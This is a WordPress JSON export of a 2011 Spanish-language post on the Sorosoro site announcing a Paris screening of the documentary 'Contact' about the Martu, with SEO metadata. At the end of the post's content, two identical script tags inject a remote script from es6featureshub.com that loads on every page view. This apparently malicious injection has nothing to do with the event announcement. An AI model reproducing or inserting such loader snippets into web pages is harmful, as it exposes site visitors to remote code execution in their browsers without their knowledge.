{"id":47001,"date":"2011-05-04T08:30:07","date_gmt":"2011-05-04T06:30:07","guid":{"rendered":"http:\/\/www.sorosoro.org\/?p=47001"},"modified":"2025-10-21T22:53:32","modified_gmt":"2025-10-21T20:53:32","slug":"martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris","status":"publish","type":"post","link":"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/","title":{"rendered":"Martes 3 de mayo de 2011: proyecci\u00f3n de la pel\u00edcula australiana \u00abContacto \u2013 El d\u00eda en el que vino el hombre blanco\u00bb, Par\u00eds"},"content":{"rendered":"<p style=\"text-align: justify;\">La historia es la siguiente: en <strong>1964<\/strong>, antes de las pruebas de lanzamiento de sat\u00e9lites, oficiales del gobierno australiano se van a expedici\u00f3n al oeste del pa\u00eds con el fin de asegurarse que esta parte de la isla-continente que servir\u00eda de zona de impacto estuviera desierta. Son acompa\u00f1ados por gu\u00edas que hablan en lenguas abor\u00edgenes, y descubren que esta zona no est\u00e1 de hecho desierta en absoluto. Despu\u00e9s de varias tentativas para volver en contacto con los Abor\u00edgenes que viven en el mismo lugar, acaban por encontrar a los <strong>Martu<\/strong>: una tribu compuesta \u00fanicamente de mujeres y de ni\u00f1os\u2026<\/p>\n<p style=\"text-align: justify;\">\n<div id=\"attachment_47003\" style=\"width: 356px\" class=\"wp-caption aligncenter\"><a rel=\"attachment wp-att-47003\" href=\"https:\/\/www.sorosoro.org\/es\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-%c2%abcontacto-%e2%80%93-el-dia-en-el-que-vino-el-hombre-blanco%c2%bb-paris\/contact-3\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-47003\" class=\"size-full wp-image-47003 \" title=\"Contact\" src=\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/Contact.jpg\" alt=\" \" width=\"346\" height=\"226\" srcset=\"https:\/\/www.sorosoro.org\/wp-content\/uploads\/Contact.jpg 346w, https:\/\/www.sorosoro.org\/wp-content\/uploads\/Contact-300x195.jpg 300w\" sizes=\"auto, (max-width: 346px) 100vw, 346px\" \/><\/a><p id=\"caption-attachment-47003\" class=\"wp-caption-text\"> <\/p><\/div>\n<p style=\"text-align: justify;\">Esta<strong> pel\u00edcula documental de Martin Butter y Bentley Dean <\/strong>se apoya en archivos rodados de la expedici\u00f3n. Cerca de 50 a\u00f1os m\u00e1s tarde, los realizadores le conceden la palabra al oficial Terry Long, y tambi\u00e9n a dos Abor\u00edgenes, Yuwali y su prima Thelma, de 17 y 8 a\u00f1os en la \u00e9poca de los hechos. \u00c9stas cuentan particularmente su primer contacto con estos hombres blancos a los que tomaban por demonios can\u00edbales!<\/p>\n<p style=\"text-align: justify;\">M\u00e1s all\u00e1 de la evocaci\u00f3n del pasado, la pel\u00edcula es tambi\u00e9n el reflejo de una parte de la sociedad australiana contempor\u00e1nea. Recibi\u00f3 el <strong>Precio del el mejor documental al Festival de la Pel\u00edcula de Sidney en 2009<\/strong>.<\/p>\n<p style=\"text-align: justify;\">La proyecci\u00f3n de la Pri en su versi\u00f3n larga in\u00e9dita esta organizad&amp; por <strong><a href=\"http:\/\/www.survivalfrance.org\/agir\/agenda\/85\" target=\"_blank\">Survival International<\/a><\/strong>, en presencia de dos etn\u00f3logos, Jessica et Largy Healy.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><strong><em>Martes 3 de mayo \u00e0 20h<\/em><\/strong><\/p>\n<p style=\"text-align: justify;\"><strong><em>Cin\u00e9ma La Clef<\/em><\/strong><\/p>\n<p style=\"text-align: justify;\"><strong><em>34 rue Daubenton<\/em><\/strong><\/p>\n<p style=\"text-align: justify;\"><strong><em>75005 Paris<\/em><\/strong><\/p>\n<p><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La historia es la siguiente: en 1964, antes de las pruebas de lanzamiento de sat\u00e9lites, oficiales del gobierno australiano se van a expedici\u00f3n al oeste del pa\u00eds con el fin de asegurarse que esta parte de la isla-continente que servir\u00eda de zona de impacto estuviera desierta. Son acompa\u00f1ados por gu\u00edas que hablan en lenguas abor\u00edgenes, [&hellip;]<\/p>\n","protected":false},"author":18,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10],"tags":[],"class_list":["post-47001","post","type-post","status-publish","format-standard","hentry","category-calendario"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Martes 3 de mayo de 2011: proyecci\u00f3n de la pel\u00edcula australiana \u00abContacto \u2013 El d\u00eda en el que vino el hombre blanco\u00bb, Par\u00eds - Sorosoro<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Martes 3 de mayo de 2011: proyecci\u00f3n de la pel\u00edcula australiana \u00abContacto \u2013 El d\u00eda en el que vino el hombre blanco\u00bb, Par\u00eds - Sorosoro\" \/>\n<meta property=\"og:description\" content=\"La historia es la siguiente: en 1964, antes de las pruebas de lanzamiento de sat\u00e9lites, oficiales del gobierno australiano se van a expedici\u00f3n al oeste del pa\u00eds con el fin de asegurarse que esta parte de la isla-continente que servir\u00eda de zona de impacto estuviera desierta. Son acompa\u00f1ados por gu\u00edas que hablan en lenguas abor\u00edgenes, [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/\" \/>\n<meta property=\"og:site_name\" content=\"Sorosoro\" \/>\n<meta property=\"article:published_time\" content=\"2011-05-04T06:30:07+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T20:53:32+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/Contact.jpg\" \/>\n<meta name=\"author\" content=\"Michel.Lemee\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Michel.Lemee\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/\"},\"author\":{\"name\":\"Michel.Lemee\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"headline\":\"Martes 3 de mayo de 2011: proyecci\u00f3n de la pel\u00edcula australiana \u00abContacto \u2013 El d\u00eda en el que vino el hombre blanco\u00bb, Par\u00eds\",\"datePublished\":\"2011-05-04T06:30:07+00:00\",\"dateModified\":\"2025-10-21T20:53:32+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/\"},\"wordCount\":298,\"image\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/#primaryimage\"},\"thumbnailUrl\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/Contact.jpg\",\"articleSection\":[\"Calendario\"],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/\",\"url\":\"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/\",\"name\":\"Martes 3 de mayo de 2011: proyecci\u00f3n de la pel\u00edcula australiana \u00abContacto \u2013 El d\u00eda en el que vino el hombre blanco\u00bb, Par\u00eds - Sorosoro\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/#primaryimage\"},\"thumbnailUrl\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/Contact.jpg\",\"datePublished\":\"2011-05-04T06:30:07+00:00\",\"dateModified\":\"2025-10-21T20:53:32+00:00\",\"author\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/#primaryimage\",\"url\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/Contact.jpg\",\"contentUrl\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/Contact.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.sorosoro.org\/es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Martes 3 de mayo de 2011: proyecci\u00f3n de la pel\u00edcula australiana \u00abContacto \u2013 El d\u00eda en el que vino el hombre blanco\u00bb, Par\u00eds\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\",\"url\":\"https:\/\/www.sorosoro.org\/es\/\",\"name\":\"Sorosoro\",\"description\":\"Pour que vivent les langues du monde !\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\",\"name\":\"Michel.Lemee\",\"url\":\"https:\/\/www.sorosoro.org\/es\/author\/michel-lemee\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Martes 3 de mayo de 2011: proyecci\u00f3n de la pel\u00edcula australiana \u00abContacto \u2013 El d\u00eda en el que vino el hombre blanco\u00bb, Par\u00eds - Sorosoro","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/","og_locale":"es_ES","og_type":"article","og_title":"Martes 3 de mayo de 2011: proyecci\u00f3n de la pel\u00edcula australiana \u00abContacto \u2013 El d\u00eda en el que vino el hombre blanco\u00bb, Par\u00eds - Sorosoro","og_description":"La historia es la siguiente: en 1964, antes de las pruebas de lanzamiento de sat\u00e9lites, oficiales del gobierno australiano se van a expedici\u00f3n al oeste del pa\u00eds con el fin de asegurarse que esta parte de la isla-continente que servir\u00eda de zona de impacto estuviera desierta. Son acompa\u00f1ados por gu\u00edas que hablan en lenguas abor\u00edgenes, [&hellip;]","og_url":"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/","og_site_name":"Sorosoro","article_published_time":"2011-05-04T06:30:07+00:00","article_modified_time":"2025-10-21T20:53:32+00:00","og_image":[{"url":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/Contact.jpg","type":"","width":"","height":""}],"author":"Michel.Lemee","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Michel.Lemee","Tiempo de lectura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/#article","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/"},"author":{"name":"Michel.Lemee","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"headline":"Martes 3 de mayo de 2011: proyecci\u00f3n de la pel\u00edcula australiana \u00abContacto \u2013 El d\u00eda en el que vino el hombre blanco\u00bb, Par\u00eds","datePublished":"2011-05-04T06:30:07+00:00","dateModified":"2025-10-21T20:53:32+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/"},"wordCount":298,"image":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/#primaryimage"},"thumbnailUrl":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/Contact.jpg","articleSection":["Calendario"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/","url":"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/","name":"Martes 3 de mayo de 2011: proyecci\u00f3n de la pel\u00edcula australiana \u00abContacto \u2013 El d\u00eda en el que vino el hombre blanco\u00bb, Par\u00eds - Sorosoro","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/#primaryimage"},"image":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/#primaryimage"},"thumbnailUrl":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/Contact.jpg","datePublished":"2011-05-04T06:30:07+00:00","dateModified":"2025-10-21T20:53:32+00:00","author":{"@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"breadcrumb":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/#primaryimage","url":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/Contact.jpg","contentUrl":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/Contact.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/www.sorosoro.org\/es\/2011\/05\/martes-3-de-mayo-de-2011-proyeccion-de-la-pelicula-australiana-contacto-el-dia-en-el-que-vino-el-hombre-blanco-paris\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.sorosoro.org\/es\/"},{"@type":"ListItem","position":2,"name":"Martes 3 de mayo de 2011: proyecci\u00f3n de la pel\u00edcula australiana \u00abContacto \u2013 El d\u00eda en el que vino el hombre blanco\u00bb, Par\u00eds"}]},{"@type":"WebSite","@id":"https:\/\/www.sorosoro.org\/es\/#website","url":"https:\/\/www.sorosoro.org\/es\/","name":"Sorosoro","description":"Pour que vivent les langues du monde !","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Person","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18","name":"Michel.Lemee","url":"https:\/\/www.sorosoro.org\/es\/author\/michel-lemee\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/47001","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/users\/18"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/comments?post=47001"}],"version-history":[{"count":0,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/47001\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/media?parent=47001"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/categories?post=47001"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/tags?post=47001"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}